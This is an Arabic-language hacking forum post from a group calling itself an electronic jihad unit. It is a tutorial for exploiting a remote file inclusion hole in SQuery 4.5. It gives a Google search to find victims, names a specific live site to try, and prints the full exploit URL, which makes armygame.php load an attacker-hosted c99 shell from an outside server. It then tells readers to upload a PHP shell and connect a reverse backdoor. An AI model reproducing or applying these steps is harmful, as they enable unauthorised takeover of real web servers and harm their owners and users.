Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: ثغره من خلال تسطيع رفع شل


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
ثغره من خلال تسطيع رفع شل
Permalink   
 


بسم الله الرحمن الرحيم

كيف حالكم شباب انشاء الله بخير

اليوم جايبكلم ثغرة حلوة وخطيرة وسهلة ( 3 في 1 )

نبدأ الشرح ::..

اول شي اول شي نروح للقوقل

www.GoOgLe.CoM
ونبحث عن :
كود:
SQuery 4.5


راح نلاقي مواقع كتيرة (( نصهم سكروا الثغرة ورة يومين من اكتشافها معليش ))

بس انا جبتلكم موقع للتجربة

http://www.ucsserver.com

المهم حتقولي كيف نستثمر الثغرة ؟؟
حقولك بعد رابط الموقع تضيف
كود:
SQuery/lib/armygame.php?libpath=http://members.lycos.co.uk/dmarhackerz/ss.txt?


مع تغير ال http://members.lycos.co.uk/dmarhackerz/ss.txt
الى رابط الشيل تبعك بس لازم يكون امتداد الشيل txt
يعني مثال :
عندي شيل c99.php
روح نشيل .php
ونحط
كود:
.txt


وترفعه على موقعك وحطها برابط الاستغلال

ملاحطة مهمة ((( بعد رابط الشيل تبعك لازم تحط علامة ؟ )))

بحيث الموقع راح يصير على الشكل التالي :
كود:
http://www.ucsserver.com/SQuery/lib/armygame.php?libpath=http://members.lycos.co.uk/dmarhackerz/ss.txt?

وهاي صورة : ( معليش حكينا مصور بس الموضوع فيه بس صورة وحدة لأن اصلا الثغرة بدهاش شرح )


بعد ما تطبق الثغرة روح شوفلك ملف تصريح 777 وارفع فيه شيل وجيب رابطها وبعدين راح تصير عندك شيل .php يعني مش زي الثغرة .txt

بعدها ارفع باكدور عكسي واتصل فيه وبعدين شوف شغلك

انتهى الشرح
اي استفسار انا حاظر
$$ شباب الرجاء حفظ الحقوق BadNet

__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard